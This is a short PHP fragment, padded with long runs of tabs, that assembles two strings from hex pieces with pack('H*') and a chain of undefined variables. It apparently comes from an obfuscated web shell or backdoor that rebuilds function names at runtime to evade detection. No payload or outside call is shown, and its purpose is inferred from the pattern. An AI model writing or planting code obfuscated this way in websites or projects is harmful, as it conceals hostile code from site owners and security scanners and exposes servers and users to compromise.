<?php																																										
																																										
 
$parle_tokens6 = pack("H*", $variable2.$variable3.$variable10.$variable7.$variable11.$variable12.$variable6.'67'.$variable7.$variable3.$variable6.'63'.$variable13.'6e'.$variable3.$variable7.$variable14.'74'.'73');
$parle_tokens7 = pack("H*", $variable9.$variable8.$variable5.'6f'.$variable2.$variable7);

